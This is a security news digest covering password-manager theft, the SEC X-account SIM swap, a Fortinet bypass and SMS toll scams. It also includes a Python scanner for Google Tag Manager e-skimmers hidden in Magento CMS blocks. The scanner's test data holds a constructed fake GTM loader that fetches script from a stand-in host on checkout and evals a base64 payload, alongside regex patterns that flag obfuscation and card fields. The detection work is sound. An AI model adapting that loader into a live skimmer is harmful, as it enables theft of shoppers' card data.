AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response


InfoSec News Nuggets 2/12/2025

Security attacks on password managers have soared

Cybercriminals are increasingly targeting password managers in an attempt to break into important digital accounts. Picus Security detailed its findings in the newly released Red Report 2025, based on an in-depth analysis of more than a million malware variants collected last year, finding that 25% of the samples targeted credentials held in password stores (the behaviour MITRE ATT&CK tracks as T1555, Credentials from Password Stores). This, the researchers claim, represents a three-fold increase compared to the year before. “For the first time ever, stealing credentials from password stores is in the top 10 techniques listed in the MITRE ATT&CK Framework,” they said. “The report reveals that these top 10 techniques accounted for 93% of all malicious actions in 2024.”


Man who SIM-swapped the SEC’s X account pleads guilty

An Alabama man has pleaded guilty after being charged with using a SIM swap to hijack the phone number tied to the Securities and Exchange Commission’s (SEC) X account in January last year. Twenty-five-year-old Eric Council Jr was charged with the offense in October, and the Justice Department said at the time that he was part of a group who attempted to manipulate the price of cryptocurrencies to their advantage. Announcing Council’s guilty plea on Monday, the department did not mention the motives behind the incident, but once again noted that the price of Bitcoin rose by more than $1,000 after the SEC’s account falsely confirmed the approval of Bitcoin exchange-traded funds (ETFs).


Fortinet discloses second firewall auth bypass patched in January

After we published our story, Fortinet informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January. Furthermore, even though today’s updated advisory indicates that both flaws were exploited in attacks and even includes a workaround for the new CSF proxy request exploitation pathway, Fortinet says that only CVE-2024-55591 was exploited. Fortinet told BleepingComputer that if a customer previously upgraded based on the guidance in FG-IR-24-535 / CVE-2024-55591, then they are already protected against the newly disclosed vulnerability.


Crooks use Google Tag Manager skimmer to steal credit card data from Magento-based e-stores

Sucuri researchers found threat actors abusing Google Tag Manager (GTM) to deploy e-skimmer malware on a Magento eCommerce site. GTM is a free tool that lets website owners manage marketing tags without modifying site code, simplifying analytics and ad tracking. Sucuri inspected the website and found the malicious code hidden in the site’s database, in the content column of the cms_block table (cms_block.content), disguised as a Google Tag Manager and Google Analytics script to evade detection. This isn’t the first time Sucuri has documented GTM being used to deploy an e-skimmer on an e-store: in 2024, the experts detailed how Magecart veteran ATMZOW was using Google Tag Manager to deliver malware. The researchers pointed out that the tactic is still being used by threat actors in the wild.
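For store operators who want to hunt for the same kind of implant, here is an added example of a scan over rows from Magento’s cms_block table. It is illustration written for this post, not Sucuri’s tooling or any Magento component; the heuristics, the allow-list of Google hosts, and the sample rows are constructed assumptions, and the SQL shown in the docstring is simply how you would pull real rows to feed it.

```python
"""
Hunt for e-skimmer code hidden in Magento CMS blocks (cms_block.content)
and disguised as Google Tag Manager / Google Analytics snippets.

Added illustration, not Sucuri's tooling or Magento code. Heuristics and
sample rows are constructed; in production feed it the output of
    SELECT identifier, content FROM cms_block;
"""
import re
from typing import Dict, List, Tuple

# Hosts a genuine GTM/GA loader talks to (assumed allow-list). A block that
# looks like GTM/GA but fetches from anywhere else deserves a human look.
GOOGLE_HOSTS = {
    "www.googletagmanager.com",
    "googletagmanager.com",
    "www.google-analytics.com",
    "google-analytics.com",
}

GTM_MARKERS = re.compile(r"GTM-[A-Z0-9]{4,10}|dataLayer|gtag\(|google-analytics", re.I)
URL_HOST = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
# Primitives a stock GTM/GA loader never needs but skimmer droppers rely on.
OBFUSCATION = re.compile(
    r"\b(?:eval|atob|unescape|String\.fromCharCode|document\.write)\b|\\x[0-9a-f]{2}"
)
# Long base64 runs are the usual carrier for the real skimmer payload.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
# Checkout / card fields the skimmer is after.
CARD_DATA = re.compile(r"cc_number|cc_cid|cvv|card_number|checkout", re.I)


def scan_block(content: str) -> List[str]:
    """Return the reasons a CMS block's content looks like a skimmer (empty if clean)."""
    reasons: List[str] = []
    if "<script" not in content.lower():
        return reasons  # plain HTML block, nothing executes
    mimics_google = bool(GTM_MARKERS.search(content))
    foreign = sorted({h.lower() for h in URL_HOST.findall(content)} - GOOGLE_HOSTS)
    if mimics_google and foreign:
        reasons.append("GTM/GA-looking script loads from non-Google host(s): " + ", ".join(foreign))
    if OBFUSCATION.search(content):
        reasons.append("obfuscation primitive (eval/atob/fromCharCode/...) in CMS block")
    if BASE64_BLOB.search(content):
        reasons.append("long base64 blob embedded in script")
    if CARD_DATA.search(content):
        reasons.append("references checkout/card fields")
    return reasons


def scan_rows(rows: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map cms_block identifier -> findings, for blocks with at least one finding."""
    result: Dict[str, List[str]] = {}
    for identifier, content in rows:
        reasons = scan_block(content)
        if reasons:
            result[identifier] = reasons
    return result


# Constructed sample rows (identifier, content) standing in for cms_block.
# The stock GTM container snippet: loads only from www.googletagmanager.com.
LEGIT_GTM = """<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>"""

# Constructed look-alike: GTM comment and container ID, but it only fires on
# checkout, loads from a hypothetical third-party host and evals a base64 payload.
FAKE_GTM = (
    "<!-- Google Tag Manager -->\n"
    "<script>if(location.pathname.indexOf('/checkout')>-1){"
    "var s=document.createElement('script');"
    "s.src='https://cdn.example-tags.net/gtm.js?id=GTM-ABCD123';"
    "document.head.appendChild(s);"
    "eval(atob('" + "QUFB" * 40 + "'));}</script>"
)

FOOTER = '<p>&copy; Example Store. <a href="/privacy">Privacy</a></p>'

SAMPLE_ROWS = [("gtm_head", LEGIT_GTM), ("footer_links", FOOTER), ("promo_banner", FAKE_GTM)]


if __name__ == "__main__":
    for ident, reasons in scan_rows(SAMPLE_ROWS).items():
        print(ident)
        for r in reasons:
            print("  -", r)
```

Only the constructed look-alike is reported; the stock GTM snippet and the plain HTML footer are clean. The same scan is worth running over cms_page.content and the design/head/includes rows of core_config_data, which are the other database locations where injected script is commonly parked, and any hit should be compared against the GTM container your marketing team actually owns before it is removed.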


Toll booth bandits continue to scam via SMS messages

North American drivers are continuing to be barraged by waves of scam text messages, telling them that they owe money on unpaid tolls. Last month we described on Hot for Security how US authorities had issued a warning about SMS phishing attacks from scammers posing as tolling agencies. For instance, Texas-based audience producer Gwen Howerton described on Bluesky how she had been duped by an unpaid toll scam after she had driven a rental car on the Dallas North Tollway – and, not being aware of the correct way to pay a toll, had believed the overdue payment demand she received to be genuine.
